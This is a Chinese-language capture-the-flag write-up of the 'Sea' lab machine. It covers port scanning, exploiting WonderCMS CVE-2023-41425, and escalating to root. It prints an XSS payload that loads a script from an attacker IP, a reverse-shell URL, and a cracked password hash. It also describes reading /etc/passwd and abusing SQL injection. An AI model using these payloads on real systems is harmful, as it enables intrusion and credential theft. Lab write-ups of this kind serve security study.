记一次渗透测试实战之Sea

华盟原创文章投稿奖励计划

Web渗透

端口扫描

使用nmap进行端口探测

自动草稿

发现存在22和80端口开放。

自动草稿

访问80端口,然后使用F12查看源代码。

自动草稿

目录爆破

接着使用工具爆破目录
发现存在一些 目录。
访问README.MD,发现是WonderCMS

自动草稿

CVE搜索

使用浏览器搜索,发现存在CVE漏洞

自动草稿

访问contact.PHP.

自动草稿

SSRF漏洞

测试功能点。

自动草稿

发现存在SSRF漏洞

自动草稿

CVE-2023-41425

接着访问index.php?目录

自动草稿

漏洞尝试

http://sea.htb/index.php?page=loginURL"></form><script src="http://10.10.16.3:8000/xss.js"></script><form action="

使用exp.py脚本尝试,发现未能攻击成功。

自动草稿

访问发现不能成功利用。
http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.16.3&lport=4444

自动草稿

查看JS文件。

自动草稿

获取Webshell

修改之后,重新尝试,成功获取shell。

自动草稿

自动草稿

获取交互式SHELL。

自动草稿

横向移动

内网信息收集

然后进行内网信息收集。

自动草稿

查看/etc/passwd

自动草稿

查看数据库文件

自动草稿

查看目录。

自动草稿

获取数据库文件

自动草稿

测试localhost

自动草稿

查看数据库文件,获取password。

自动草稿

hash解密

“password”: “$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q”,
使用hashcat解密,获取密码。

自动草稿

自动草稿

接着使用netexec验证ssh吗密码。

自动草稿

ssh登录

自动草稿

使用SU进行切换。

自动草稿

代理搭建

接着搭建代理。

自动草稿

搭建客户端。

自动草稿

访问web站点。

自动草稿

漏洞尝试

发现可以进行文件读取。

自动草稿

文件读取

然后读/etc/password

自动草稿

测试发现存在SQL注入

自动草稿

自动草稿

确定分组权限。

自动草稿

获取root权限

然后添加用户到管理员组,获取root权限。

自动草稿

文章来源:先知社区

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文


END

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容